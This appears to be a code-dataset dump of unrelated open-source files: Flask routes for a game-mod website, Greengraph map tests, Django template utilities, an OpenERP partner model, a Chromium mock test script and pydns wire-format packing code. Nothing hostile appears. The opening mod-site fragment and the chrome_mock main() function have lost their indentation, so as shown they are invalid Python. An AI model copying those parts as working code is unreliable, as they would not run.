mod = Mod.query.filter(Mod.id == mod_id).first()
if not mod:
abort(404)
if not any(m.id == mod.id for m in current_user.following):
abort(418)
event = FollowEvent.query\
.filter(FollowEvent.mod_id == mod.id)\
.order_by(desc(FollowEvent.created))\
.first()
# Events are aggregated hourly
if not event or ((datetime.now() - event.created).seconds / 60 / 60) >= 1:
event = FollowEvent()
event.mod = mod
event.delta = -1
event.events = 1
mod.follow_events.append(event)
db.add(event)
else:
event.delta -= 1
event.events += 1
mod.follower_count -= 1
current_user.following = [m for m in current_user.following if m.id != int(mod_id)]
return { "success": True }
@mods.route('/mod/<int:mod_id>/feature', methods=['POST'])
@adminrequired
@json_output
@with_session
def feature(mod_id):
    """Mark a mod as featured (admin only); 409 if already featured."""
    target = Mod.query.filter(Mod.id == mod_id).first()
    if target is None:
        abort(404)
    existing = Featured.query.filter(Featured.mod_id == mod_id).all()
    if any(existing):
        abort(409)
    entry = Featured()
    entry.mod = target
    db.add(entry)
    return { "success": True }
@mods.route('/mod/<mod_id>/unfeature', methods=['POST'])
@adminrequired
@json_output
@with_session
def unfeature(mod_id):
    """Remove a mod from the featured list (admin only)."""
    target = Mod.query.filter(Mod.id == mod_id).first()
    if target is None:
        abort(404)
    entry = Featured.query.filter(Featured.mod_id == mod_id).first()
    if entry is None:
        abort(404)
    db.delete(entry)
    return { "success": True }
@mods.route('/mod/<int:mod_id>/<path:mod_name>/publish')
@with_session
@loginrequired
def publish(mod_id, mod_name):
    # Make a mod publicly visible; only the owner may publish.
    mod = Mod.query.filter(Mod.id == mod_id).first()
    if not mod:
        abort(404)
    if current_user.id != mod.user_id:
        abort(401)
    # Refuse to publish mods that still carry the placeholder description.
    if mod.description == default_description:
        return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name, stupid_user=True))
    mod.published = True
    mod.updated = datetime.now()
    # Notify the CKAN metadata index of the newly-published mod.
    send_to_ckan(mod)
    return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route('/mod/<int:mod_id>/download/<version>', defaults={ 'mod_name': None })
@mods.route('/mod/<int:mod_id>/<path:mod_name>/download/<version>')
@with_session
def download(mod_id, mod_name, version):
    """Serve a mod version's zip file, counting downloads (aggregated hourly)."""
    mod = Mod.query.filter(Mod.id == mod_id).first()
    if not mod:
        abort(404)
    # Unpublished mods are downloadable only by their owner.
    if not mod.published and (not current_user or current_user.id != mod.user_id):
        abort(401)
    version = ModVersion.query.filter(ModVersion.mod_id == mod_id, \
            ModVersion.friendly_version == version).first()
    if not version:
        abort(404)
    # BUG FIX: the original used the Python `and` operator between the two
    # clauses inside a single filter(); that does not build a SQL AND — it
    # evaluates only one clause. Pass both clauses to filter() instead.
    download = DownloadEvent.query\
        .filter(DownloadEvent.mod_id == mod.id,
                DownloadEvent.version_id == version.id)\
        .order_by(desc(DownloadEvent.created))\
        .first()
    if not os.path.isfile(os.path.join(_cfg('storage'), version.download_path)):
        abort(404)
    # Only count full downloads, not ranged requests for partial content.
    if 'Range' not in request.headers:
        # Events are aggregated hourly
        # NOTE(review): timedelta.seconds ignores .days — confirm intended.
        if not download or ((datetime.now() - download.created).seconds / 60 / 60) >= 1:
            download = DownloadEvent()
            download.mod = mod
            download.version = version
            download.downloads = 1
            db.add(download)
            db.flush()
            db.commit()
            mod.downloads.append(download)
        else:
            download.downloads += 1
        mod.download_count += 1
    response = make_response(send_file(os.path.join(_cfg('storage'), version.download_path), as_attachment = True))
    if _cfg("use-x-accel") == 'true':
        # Let the front-end web server stream the file via X-Accel-Redirect.
        response = make_response("")
        response.headers['Content-Type'] = 'application/zip'
        response.headers['Content-Disposition'] = 'attachment; filename=' + os.path.basename(version.download_path)
        response.headers['X-Accel-Redirect'] = '/internal/' + version.download_path
    return response
@mods.route('/mod/<int:mod_id>/version/<version_id>/delete', methods=['POST'])
@with_session
@loginrequired
def delete_version(mod_id, version_id):
    # Delete a single version of a mod. The last remaining version and the
    # current default version are protected (400).
    mod = Mod.query.filter(Mod.id == mod_id).first()
    if not mod:
        abort(404)
    # Admins, the owner, and accepted co-authors may delete versions.
    editable = False
    if current_user:
        if current_user.admin:
            editable = True
        if current_user.id == mod.user_id:
            editable = True
        if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
            editable = True
    if not editable:
        abort(401)
    version = [v for v in mod.versions if v.id == int(version_id)]
    if len(mod.versions) == 1:
        abort(400)
    if len(version) == 0:
        abort(404)
    if version[0].id == mod.default_version_id:
        abort(400)
    db.delete(version[0])
    mod.versions = [v for v in mod.versions if v.id != int(version_id)]
    db.commit()
    return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route('/mod/<int:mod_id>/<mod_name>/edit_version', methods=['POST'])
@mods.route('/mod/<int:mod_id>/edit_version', methods=['POST'], defaults={ 'mod_name': None })
@with_session
@loginrequired
def edit_version(mod_name, mod_id):
    # Update the changelog text of an existing version of a mod.
    mod = Mod.query.filter(Mod.id == mod_id).first()
    if not mod:
        abort(404)
    # Admins, the owner, and accepted co-authors may edit versions.
    editable = False
    if current_user:
        if current_user.admin:
            editable = True
        if current_user.id == mod.user_id:
            editable = True
        if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
            editable = True
    if not editable:
        abort(401)
    version_id = int(request.form.get('version-id'))
    changelog = request.form.get('changelog')
    version = [v for v in mod.versions if v.id == version_id]
    if len(version) == 0:
        abort(404)
    version = version[0]
    version.changelog = changelog
    return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
@mods.route('/mod/<int:mod_id>/autoupdate', methods=['POST'])
@with_session
@loginrequired
def autoupdate(mod_id):
    # Mark the mod's default version as compatible with the newest game
    # version and notify followers by e-mail.
    mod = Mod.query.filter(Mod.id == mod_id).first()
    if not mod:
        abort(404)
    # Admins, the owner, and accepted co-authors may autoupdate.
    editable = False
    if current_user:
        if current_user.admin:
            editable = True
        if current_user.id == mod.user_id:
            editable = True
        if any([u.accepted and u.user == current_user for u in mod.shared_authors]):
            editable = True
    if not editable:
        abort(401)
    default = mod.default_version()
    # GameVersion rows are ordered descending, so .first() is the newest.
    default.ksp_version = GameVersion.query.order_by(desc(GameVersion.id)).first().friendly_version
    send_autoupdate_notification(mod)
    return redirect(url_for("mods.mod", id=mod.id, mod_name=mod.name))
| mit |
samstern/Greengraph | Greengraph/tests/test_maps.py | 1 | 2937 | from ..greengraph import Greengraph
from ..map import Map
import geopy
from nose.tools import assert_equal, assert_almost_equal
import numpy.testing as np_test
from mock import Mock, patch
import requests
from matplotlib import image
import yaml
import os
import numpy as np
#@patch.object(Greengraph, 'location_sequence')
#@patch.object(Map, 'count_green')
def test_map_constructor():
    # Verify that Map builds the expected Google Static Maps request URL,
    # both with default arguments and with every parameter overridden.
    # NOTE(review): mock_image is opened but never closed — confirm.
    mock_image= open(os.path.join(os.path.dirname(__file__),'fixtures','NY_2.png'),'rb') #as mock_imgfile:
    with patch.object(requests,'get',return_value=Mock(content=mock_image.read())) as mock_get:
        with patch.object(image,'imread') as mock_img:
            #default
            Map(40.7127837, -74.0059413) # New York
            #Longon Map(51.5073509,-0.1277583)
            mock_get.assert_called_with(
                "http://maps.googleapis.com/maps/api/staticmap?",
                params={
                    'sensor':'false',
                    'zoom':10,
                    'size':'400x400',
                    'center':'40.7127837,-74.0059413',
                    'style':'feature:all|element:labels|visibility:off',
                    'maptype': 'satellite'
                }
            )
            #changing parameters
            Map(41.8781136, -87.6297982,satellite=False,zoom=15,size=(500,350),sensor=True) # New York
            # With satellite=False no 'maptype' parameter is expected.
            mock_get.assert_called_with(
                "http://maps.googleapis.com/maps/api/staticmap?",
                params={
                    'sensor':'true',
                    'zoom':15,
                    'size':'500x350',
                    'center':'41.8781136,-87.6297982',
                    'style':'feature:all|element:labels|visibility:off',
                    #'maptype': 'satellite'
                }
            )
def test_green():
    # The green-pixel mask must match the stored fixture for the NY image at
    # threshold 1.1, and must differ at a higher threshold.
    mock_image= open(os.path.join(os.path.dirname(__file__),'fixtures','NY_2.png'),'rb')
    fixture_green = np.load(os.path.join(os.path.dirname(__file__),'fixtures','ny_green.npy'))
    threshold = 1.1
    with patch('requests.get', return_value=Mock(content=mock_image.read())) as mock_get:
        testMap = Map(41.8781136, -87.6297982) # New York
        assert_equal(fixture_green.shape,testMap.green(threshold).shape)
        assert (testMap.green(threshold) == fixture_green).all() == True
        assert (testMap.green(1.5) == fixture_green).all() == False
def test_count_green():
    # count_green() must equal the number of True pixels in the fixture mask
    # at the default threshold, and differ at a higher threshold.
    mock_image= open(os.path.join(os.path.dirname(__file__),'fixtures','NY_2.png'),'rb')
    fixture_green = np.load(os.path.join(os.path.dirname(__file__),'fixtures','ny_green.npy'))
    threshold = 1.1
    with patch('requests.get', return_value=Mock(content=mock_image.read())) as mock_get:
        testMap = Map(41.8781136, -87.6297982) # New York
        count_from_fixture=np.sum(fixture_green)
        assert (testMap.count_green() == count_from_fixture)
        assert (testMap.count_green(1.5) != count_from_fixture)
baylee/django | django/template/utils.py | 199 | 3733 | import os
from collections import Counter, OrderedDict
from django.apps import apps
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.utils import lru_cache
from django.utils._os import upath
from django.utils.functional import cached_property
from django.utils.module_loading import import_string
class InvalidTemplateEngineError(ImproperlyConfigured):
    # Raised when a requested engine alias is not in settings.TEMPLATES.
    pass
class EngineHandler(object):
    def __init__(self, templates=None):
        """
        templates is an optional list of template engine definitions
        (structured like settings.TEMPLATES).
        """
        self._templates = templates
        self._engines = {}  # alias -> instantiated backend, filled lazily

    @cached_property
    def templates(self):
        # Normalized OrderedDict of engine configs keyed by NAME, with
        # defaults filled in and duplicate aliases rejected.
        if self._templates is None:
            self._templates = settings.TEMPLATES
        templates = OrderedDict()
        backend_names = []
        for tpl in self._templates:
            tpl = tpl.copy()
            try:
                # This will raise an exception if 'BACKEND' doesn't exist or
                # isn't a string containing at least one dot.
                default_name = tpl['BACKEND'].rsplit('.', 2)[-2]
            except Exception:
                invalid_backend = tpl.get('BACKEND', '<not defined>')
                raise ImproperlyConfigured(
                    "Invalid BACKEND for a template engine: {}. Check "
                    "your TEMPLATES setting.".format(invalid_backend))
            tpl.setdefault('NAME', default_name)
            tpl.setdefault('DIRS', [])
            tpl.setdefault('APP_DIRS', False)
            tpl.setdefault('OPTIONS', {})
            templates[tpl['NAME']] = tpl
            backend_names.append(tpl['NAME'])
        counts = Counter(backend_names)
        duplicates = [alias for alias, count in counts.most_common() if count > 1]
        if duplicates:
            raise ImproperlyConfigured(
                "Template engine aliases aren't unique, duplicates: {}. "
                "Set a unique NAME for each engine in settings.TEMPLATES."
                .format(", ".join(duplicates)))
        return templates

    def __getitem__(self, alias):
        # Return the engine for ``alias``, instantiating and caching it on
        # first successful access.
        try:
            return self._engines[alias]
        except KeyError:
            try:
                params = self.templates[alias]
            except KeyError:
                raise InvalidTemplateEngineError(
                    "Could not find config for '{}' "
                    "in settings.TEMPLATES".format(alias))
            # If importing or initializing the backend raises an exception,
            # self._engines[alias] isn't set and this code may get executed
            # again, so we must preserve the original params. See #24265.
            params = params.copy()
            backend = params.pop('BACKEND')
            engine_cls = import_string(backend)
            engine = engine_cls(params)
            self._engines[alias] = engine
            return engine

    def __iter__(self):
        # Iterate over the configured engine aliases.
        return iter(self.templates)

    def all(self):
        # Instantiate (if needed) and return every configured engine.
        return [self[alias] for alias in self]
@lru_cache.lru_cache()
def get_app_template_dirs(dirname):
    """
    Return an iterable of paths of directories to load app templates from.

    dirname is the name of the subdirectory containing templates inside
    installed applications.
    """
    candidates = (
        os.path.join(app_config.path, dirname)
        for app_config in apps.get_app_configs()
        if app_config.path
    )
    # Immutable return value because it will be cached and shared by callers.
    return tuple(upath(d) for d in candidates if os.path.isdir(d))
iw3hxn/LibrERP | l10n_ch_scan_bvr/partner.py | 4 | 1433 | # -*- coding: utf-8 -*-
##############################################################################
#
# Author: Vincent Renaville
# Copyright 2013 Camptocamp SA
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv.orm import Model, fields
class ResPartner(Model):
    # Extension of res.partner: adds the default product used by the
    # l10n_ch scan-BVR wizard when generating supplier invoice lines.
    _inherit = 'res.partner'
    _columns = {
        'supplier_invoice_default_product': fields.many2one(
            'product.product',
            'Default product supplier invoice',
            help="Use by the scan BVR wizard, if completed, it'll generate "
                 "a line with the proper amount and this specified product"
        ),
    }
| agpl-3.0 |
hefen1/chromium | native_client_sdk/src/tools/tests/chrome_mock.py | 51 | 1549 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Mock chrome process used by test code for http server."""
import argparse
import sys
import time
import urllib2
def PrintAndFlush(s):
  """Write *s* followed by a newline to stdout and flush immediately."""
  print(s)
  sys.stdout.flush()
def main(args):
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--post', help='POST to URL.', dest='post',
action='store_true')
parser.add_argument('--get', help='GET to URL.', dest='get',
action='store_true')
parser.add_argument('--sleep',
help='Number of seconds to sleep after reading URL',
dest='sleep', default=0)
parser.add_argument('--expect-to-be-killed', help='If set, the script will'
' warn if it isn\'t killed before it finishes sleeping.',
dest='expect_to_be_killed', action='store_true')
parser.add_argument('url')
options = parser.parse_args(args)
PrintAndFlush('Starting %s.' % sys.argv[0])
if options.post:
urllib2.urlopen(options.url, data='').read()
elif options.get:
urllib2.urlopen(options.url).read()
else:
# Do nothing but wait to be killed.
pass
time.sleep(float(options.sleep))
if options.expect_to_be_killed:
PrintAndFlush('Done sleeping. Expected to be killed.')
return 0
if __name__ == '__main__':
sys.exit(main(sys.argv[1:]))
| bsd-3-clause |
cfromknecht/namecoin-legacy | client/DNS/Lib.py | 39 | 23343 | # -*- encoding: utf-8 -*-
"""
$Id: Lib.py,v 1.11.2.7 2009/06/09 18:39:06 customdesigned Exp $
This file is part of the pydns project.
Homepage: http://pydns.sourceforge.net
This code is covered by the standard Python License.
Library code. Largely this is packers and unpackers for various types.
"""
#
#
# See RFC 1035:
# ------------------------------------------------------------------------
# Network Working Group P. Mockapetris
# Request for Comments: 1035 ISI
# November 1987
# Obsoletes: RFCs 882, 883, 973
#
# DOMAIN NAMES - IMPLEMENTATION AND SPECIFICATION
# ------------------------------------------------------------------------
import string, types
import Type
import Class
import Opcode
import Status
import DNS
from Base import DNSError
LABEL_UTF8 = False
LABEL_ENCODING = 'idna'
class UnpackError(DNSError):
    # Raised when a DNS message cannot be decoded (truncated or overrun data).
    pass
class PackError(DNSError):
    # Raised when a value cannot be encoded into DNS wire format.
    pass
# Low-level 16 and 32 bit integer packing and unpacking
from struct import pack as struct_pack
from struct import unpack as struct_unpack
from socket import inet_ntoa, inet_aton
def pack16bit(n):
    """Encode *n* as a network-order (big-endian) unsigned 16-bit value."""
    return struct_pack('!H', n)

def pack32bit(n):
    """Encode *n* as a network-order unsigned 32-bit value."""
    return struct_pack('!L', n)

def unpack16bit(s):
    """Decode a network-order unsigned 16-bit value from *s*."""
    (value,) = struct_unpack('!H', s)
    return value

def unpack32bit(s):
    """Decode a network-order unsigned 32-bit value from *s*."""
    (value,) = struct_unpack('!L', s)
    return value

def addr2bin(addr):
    """Convert a dotted-quad IPv4 string to a (signed) 32-bit integer."""
    packed = inet_aton(addr)
    (value,) = struct_unpack('!l', packed)
    return value

def bin2addr(n):
    """Convert a 32-bit integer to a dotted-quad IPv4 string."""
    return inet_ntoa(struct_pack('!L', n))
# Packing class
class Packer:
    " packer base class. supports basic byte/16bit/32bit/addr/string/name "
    # Accumulates DNS wire-format data in self.buf; self.index maps
    # upper-cased name suffixes to buffer offsets for name compression.

    def __init__(self):
        self.buf = ''
        self.index = {}

    def getbuf(self):
        # Return the message packed so far.
        return self.buf

    def addbyte(self, c):
        # Append a single character; rejects longer strings.
        if len(c) != 1: raise TypeError, 'one character expected'
        self.buf = self.buf + c

    def addbytes(self, bytes):
        # Append a raw byte string verbatim.
        self.buf = self.buf + bytes

    def add16bit(self, n):
        # Append n as a network-order unsigned 16-bit value.
        self.buf = self.buf + pack16bit(n)

    def add32bit(self, n):
        # Append n as a network-order unsigned 32-bit value.
        self.buf = self.buf + pack32bit(n)

    def addaddr(self, addr):
        # Append a dotted-quad IPv4 address as 4 raw bytes.
        n = addr2bin(addr)
        self.buf = self.buf + pack32bit(n)

    def addstring(self, s):
        # Append a <character-string>: one length byte plus the data
        # (RFC 1035 limits these to 255 bytes).
        if len(s) > 255:
            raise ValueError, "Can't encode string of length "+ \
                "%s (> 255)"%(len(s))
        self.addbyte(chr(len(s)))
        self.addbytes(s)

    def addname(self, name):
        # Domain name packing (section 4.1.4)
        # Add a domain name to the buffer, possibly using pointers.
        # The case of the first occurrence of a name is preserved.
        # Redundant dots are ignored.
        list = []
        for label in string.splitfields(name, '.'):
            if not label:
                raise PackError, 'empty label'
            list.append(label)
        # Find the longest suffix of the name that was already packed
        # (case-insensitive), so it can be replaced by a compression pointer.
        keys = []
        for i in range(len(list)):
            key = string.upper(string.joinfields(list[i:], '.'))
            keys.append(key)
            if self.index.has_key(key):
                pointer = self.index[key]
                break
        else:
            i = len(list)
            pointer = None
        # Do it into temporaries first so exceptions don't
        # mess up self.index and self.buf
        buf = ''
        offset = len(self.buf)
        index = []
        if DNS.LABEL_UTF8:
            enc = 'utf8'
        else:
            enc = DNS.LABEL_ENCODING
        for j in range(i):
            label = list[j]
            try:
                label = label.encode(enc)
            except UnicodeEncodeError:
                if not DNS.LABEL_UTF8: raise
                # prefix a BOM so the receiver can recognise the encoding
                if not label.startswith('\ufeff'):
                    label = '\ufeff'+label
                label = label.encode(enc)
            n = len(label)
            if n > 63:
                raise PackError, 'label too long'
            # Compression pointers are only 14 bits wide, so offsets past
            # 0x3FFF cannot be registered for later reuse.
            if offset + len(buf) < 0x3FFF:
                index.append((keys[j], offset + len(buf)))
            else:
                print 'DNS.Lib.Packer.addname:',
                print 'warning: pointer too big'
            buf = buf + (chr(n) + label)
        if pointer:
            # The top two bits mark this 16-bit field as a pointer.
            buf = buf + pack16bit(pointer | 0xC000)
        else:
            # The root (zero-length) label terminates the name.
            buf = buf + '\0'
        self.buf = self.buf + buf
        for key, value in index:
            self.index[key] = value

    def dump(self):
        # Debugging aid: print the compression index and a two-bytes-per-row
        # dump of the buffer to stdout ('**' filler rows are collapsed).
        keys = self.index.keys()
        keys.sort()
        print '-'*40
        for key in keys:
            print '%20s %3d' % (key, self.index[key])
        print '-'*40
        space = 1
        for i in range(0, len(self.buf)+1, 2):
            if self.buf[i:i+2] == '**':
                if not space: print
                space = 1
                continue
            space = 0
            print '%4d' % i,
            for c in self.buf[i:i+2]:
                if ' ' < c < '\177':
                    print ' %c' % c,
                else:
                    print '%2d' % ord(c),
            print
        print '-'*40
# Unpacking class
class Unpacker:
    # Sequential reader over a DNS wire-format buffer; self.offset is the
    # current read position.

    def __init__(self, buf):
        self.buf = buf
        self.offset = 0

    def getbyte(self):
        # Return the next single character, advancing the offset.
        if self.offset >= len(self.buf):
            raise UnpackError, "Ran off end of data"
        c = self.buf[self.offset]
        self.offset = self.offset + 1
        return c

    def getbytes(self, n):
        # Return the next n bytes, advancing the offset.
        s = self.buf[self.offset : self.offset + n]
        if len(s) != n: raise UnpackError, 'not enough data left'
        self.offset = self.offset + n
        return s

    def get16bit(self):
        # Read a network-order unsigned 16-bit value.
        return unpack16bit(self.getbytes(2))

    def get32bit(self):
        # Read a network-order unsigned 32-bit value.
        return unpack32bit(self.getbytes(4))

    def getaddr(self):
        # Read 4 bytes and return them as a dotted-quad IPv4 string.
        return bin2addr(self.get32bit())

    def getstring(self):
        # Read a <character-string>: a length byte followed by the data.
        return self.getbytes(ord(self.getbyte()))

    def getname(self):
        # Domain name unpacking (section 4.1.4)
        c = self.getbyte()
        i = ord(c)
        if i & 0xC0 == 0xC0:
            # Compression pointer: follow it recursively, then restore the
            # original read position.
            d = self.getbyte()
            j = ord(d)
            pointer = ((i<<8) | j) & ~0xC000
            save_offset = self.offset
            try:
                self.offset = pointer
                domain = self.getname()
            finally:
                self.offset = save_offset
            return domain
        if i == 0:
            # Root label: end of the name.
            return ''
        domain = self.getbytes(i)
        remains = self.getname()
        if not remains:
            return domain
        else:
            return domain + '.' + remains
# Test program for packin/unpacking (section 4.1.4)
def testpacker():
    # Smoke/benchmark routine for Packer/Unpacker, using the example names
    # from RFC 1035, section 4.1.4.
    # NOTE(review): depends on a 'timing' module that is not part of the
    # standard library -- presumably only available in the original
    # development environment; confirm before relying on this function.
    N = 2500
    R = range(N)
    import timing
    # See section 4.1.4 of RFC 1035
    timing.start()
    for i in R:
        p = Packer()
        p.addaddr('192.168.0.1')
        p.addbytes('*' * 20)
        p.addname('f.ISI.ARPA')
        p.addbytes('*' * 8)
        p.addname('Foo.F.isi.arpa')
        p.addbytes('*' * 18)
        p.addname('arpa')
        p.addbytes('*' * 26)
        p.addname('')
    timing.finish()
    print timing.milli(), "ms total for packing"
    print round(timing.milli() / i, 4), 'ms per packing'
    #p.dump()
    # Unpack once to sanity-check the round trip ...
    u = Unpacker(p.buf)
    u.getaddr()
    u.getbytes(20)
    u.getname()
    u.getbytes(8)
    u.getname()
    u.getbytes(18)
    u.getname()
    u.getbytes(26)
    u.getname()
    # ... then time repeated unpacking of the same buffer.
    timing.start()
    for i in R:
        u = Unpacker(p.buf)
        res = (u.getaddr(),
               u.getbytes(20),
               u.getname(),
               u.getbytes(8),
               u.getname(),
               u.getbytes(18),
               u.getname(),
               u.getbytes(26),
               u.getname())
    timing.finish()
    print timing.milli(), "ms total for unpacking"
    print round(timing.milli() / i, 4), 'ms per unpacking'
    #for item in res: print item
# Pack/unpack RR toplevel format (section 3.2.1)
class RRpacker(Packer):
    # Packer for complete resource records (RFC 1035, section 3.2.1).
    # self.rdstart remembers where the current record's RDATA began so the
    # RDLENGTH field can be patched once the data has actually been written.

    def __init__(self):
        Packer.__init__(self)
        self.rdstart = None

    def addRRheader(self, name, type, klass, ttl, *rest):
        # Pack NAME, TYPE, CLASS, TTL and a provisional RDLENGTH (an optional
        # single extra positional argument; defaults to 0 and is patched later).
        self.addname(name)
        self.add16bit(type)
        self.add16bit(klass)
        self.add32bit(ttl)
        if rest:
            if rest[1:]: raise TypeError, 'too many args'
            rdlength = rest[0]
        else:
            rdlength = 0
        self.add16bit(rdlength)
        self.rdstart = len(self.buf)

    def patchrdlength(self):
        # Rewrite RDLENGTH so it matches the RDATA actually appended.
        rdlength = unpack16bit(self.buf[self.rdstart-2:self.rdstart])
        if rdlength == len(self.buf) - self.rdstart:
            return
        rdata = self.buf[self.rdstart:]
        save_buf = self.buf
        ok = 0
        try:
            self.buf = self.buf[:self.rdstart-2]
            self.add16bit(len(rdata))
            self.buf = self.buf + rdata
            ok = 1
        finally:
            # Restore the untouched buffer if the splice failed part-way.
            if not ok: self.buf = save_buf

    def endRR(self):
        # Close the current record, fixing up RDLENGTH if necessary.
        if self.rdstart is not None:
            self.patchrdlength()
        self.rdstart = None

    def getbuf(self):
        if self.rdstart is not None: self.patchrdlength()
        return Packer.getbuf(self)

    # Standard RRs (section 3.3)
    def addCNAME(self, name, klass, ttl, cname):
        self.addRRheader(name, Type.CNAME, klass, ttl)
        self.addname(cname)
        self.endRR()

    def addHINFO(self, name, klass, ttl, cpu, os):
        self.addRRheader(name, Type.HINFO, klass, ttl)
        self.addstring(cpu)
        self.addstring(os)
        self.endRR()

    def addMX(self, name, klass, ttl, preference, exchange):
        self.addRRheader(name, Type.MX, klass, ttl)
        self.add16bit(preference)
        self.addname(exchange)
        self.endRR()

    def addNS(self, name, klass, ttl, nsdname):
        self.addRRheader(name, Type.NS, klass, ttl)
        self.addname(nsdname)
        self.endRR()

    def addPTR(self, name, klass, ttl, ptrdname):
        self.addRRheader(name, Type.PTR, klass, ttl)
        self.addname(ptrdname)
        self.endRR()

    def addSOA(self, name, klass, ttl,
               mname, rname, serial, refresh, retry, expire, minimum):
        self.addRRheader(name, Type.SOA, klass, ttl)
        self.addname(mname)
        self.addname(rname)
        self.add32bit(serial)
        self.add32bit(refresh)
        self.add32bit(retry)
        self.add32bit(expire)
        self.add32bit(minimum)
        self.endRR()

    def addTXT(self, name, klass, ttl, list):
        self.addRRheader(name, Type.TXT, klass, ttl)
        # Accept a bare string as a single-element list.
        if type(list) is types.StringType:
            list = [list]
        for txtdata in list:
            self.addstring(txtdata)
        self.endRR()

    # Internet specific RRs (section 3.4) -- class = IN
    def addA(self, name, klass, ttl, address):
        self.addRRheader(name, Type.A, klass, ttl)
        self.addaddr(address)
        self.endRR()

    def addWKS(self, name, ttl, address, protocol, bitmap):
        self.addRRheader(name, Type.WKS, Class.IN, ttl)
        self.addaddr(address)
        self.addbyte(chr(protocol))
        self.addbytes(bitmap)
        self.endRR()

    def addSRV(self):
        # Placeholder -- SRV packing has not been implemented.
        raise NotImplementedError
def prettyTime(seconds):
    """Return (seconds, human-readable string) for a time span in seconds.

    The text uses the largest unit strictly smaller than the span:
    seconds < 1 min, minutes < 1 h, hours < 1 day, days < 1 week, else weeks.
    """
    # (upper bound, unit label, divisor) in ascending order.
    scales = (
        (60, "seconds", 1),
        (3600, "minutes", 60),
        (86400, "hours", 3600),
        (604800, "days", 86400),
    )
    for limit, unit, divisor in scales:
        if seconds < limit:
            return seconds, "%d %s" % (seconds / divisor, unit)
    return seconds, "%d weeks" % (seconds / 604800)
class RRunpacker(Unpacker):
    # Unpacker for complete resource records; self.rdend marks the buffer
    # offset where the current record's RDATA must end.

    def __init__(self, buf):
        Unpacker.__init__(self, buf)
        self.rdend = None

    def getRRheader(self):
        # Decode NAME/TYPE/CLASS/TTL/RDLENGTH and remember where RDATA ends.
        name = self.getname()
        rrtype = self.get16bit()
        klass = self.get16bit()
        ttl = self.get32bit()
        rdlength = self.get16bit()
        self.rdend = self.offset + rdlength
        return (name, rrtype, klass, ttl, rdlength)

    def endRR(self):
        # Sanity check: the type-specific getter must consume all RDATA.
        if self.offset != self.rdend:
            raise UnpackError, 'end of RR not reached'

    def getCNAMEdata(self):
        return self.getname()

    def getHINFOdata(self):
        # (cpu, os)
        return self.getstring(), self.getstring()

    def getMXdata(self):
        # (preference, exchange)
        return self.get16bit(), self.getname()

    def getNSdata(self):
        return self.getname()

    def getPTRdata(self):
        return self.getname()

    def getSOAdata(self):
        # Labelled tuples; the timer fields are (label, seconds, pretty text).
        return self.getname(), \
               self.getname(), \
               ('serial',)+(self.get32bit(),), \
               ('refresh ',)+prettyTime(self.get32bit()), \
               ('retry',)+prettyTime(self.get32bit()), \
               ('expire',)+prettyTime(self.get32bit()), \
               ('minimum',)+prettyTime(self.get32bit())

    def getTXTdata(self):
        # TXT RDATA is a sequence of <character-string>s.
        list = []
        while self.offset != self.rdend:
            list.append(self.getstring())
        return list

    # SPF records share the TXT wire format.
    getSPFdata = getTXTdata

    def getAdata(self):
        return self.getaddr()

    def getWKSdata(self):
        address = self.getaddr()
        protocol = ord(self.getbyte())
        # The bitmap occupies whatever remains of the RDATA.
        bitmap = self.getbytes(self.rdend - self.offset)
        return address, protocol, bitmap

    def getSRVdata(self):
        """
        _Service._Proto.Name TTL Class SRV Priority Weight Port Target
        """
        priority = self.get16bit()
        weight = self.get16bit()
        port = self.get16bit()
        target = self.getname()
        #print '***priority, weight, port, target', priority, weight, port, target
        return priority, weight, port, target
# Pack/unpack Message Header (section 4.1)
class Hpacker(Packer):
    """Packer for the 12-byte DNS message header (RFC 1035, section 4.1.1)."""

    def addHeader(self, id, qr, opcode, aa, tc, rd, ra, z, rcode,
                  qdcount, ancount, nscount, arcount):
        # Fold the individual flag fields into the single 16-bit flags word.
        flags = (qr & 1) << 15
        flags |= (opcode & 0xF) << 11
        flags |= (aa & 1) << 10
        flags |= (tc & 1) << 9
        flags |= (rd & 1) << 8
        flags |= (ra & 1) << 7
        flags |= (z & 7) << 4
        flags |= rcode & 0xF
        self.add16bit(id)
        self.add16bit(flags)
        # The four section counts follow in wire order.
        for count in (qdcount, ancount, nscount, arcount):
            self.add16bit(count)
class Hunpacker(Unpacker):
    """Unpacker for the DNS message header."""

    def getHeader(self):
        # ID, then the packed flags word, then the four section counts.
        ident = self.get16bit()
        flags = self.get16bit()
        qr = (flags >> 15) & 1
        opcode = (flags >> 11) & 0xF
        aa = (flags >> 10) & 1
        tc = (flags >> 9) & 1
        rd = (flags >> 8) & 1
        ra = (flags >> 7) & 1
        z = (flags >> 4) & 7
        rcode = flags & 0xF
        qdcount = self.get16bit()
        ancount = self.get16bit()
        nscount = self.get16bit()
        arcount = self.get16bit()
        return (ident, qr, opcode, aa, tc, rd, ra, z, rcode,
                qdcount, ancount, nscount, arcount)
# Pack/unpack Question (section 4.1.2)
class Qpacker(Packer):
    """Packer for the question section (RFC 1035, section 4.1.2)."""

    def addQuestion(self, qname, qtype, qclass):
        # QNAME first, then QTYPE and QCLASS as 16-bit fields.
        self.addname(qname)
        for field in (qtype, qclass):
            self.add16bit(field)
class Qunpacker(Unpacker):
    """Unpacker for the question section."""

    def getQuestion(self):
        # Fields are read in wire order: QNAME, QTYPE, QCLASS.
        qname = self.getname()
        qtype = self.get16bit()
        qclass = self.get16bit()
        return qname, qtype, qclass
# Pack/unpack Message(section 4)
# NB the order of the base classes is important for __init__()!
class Mpacker(RRpacker, Qpacker, Hpacker):
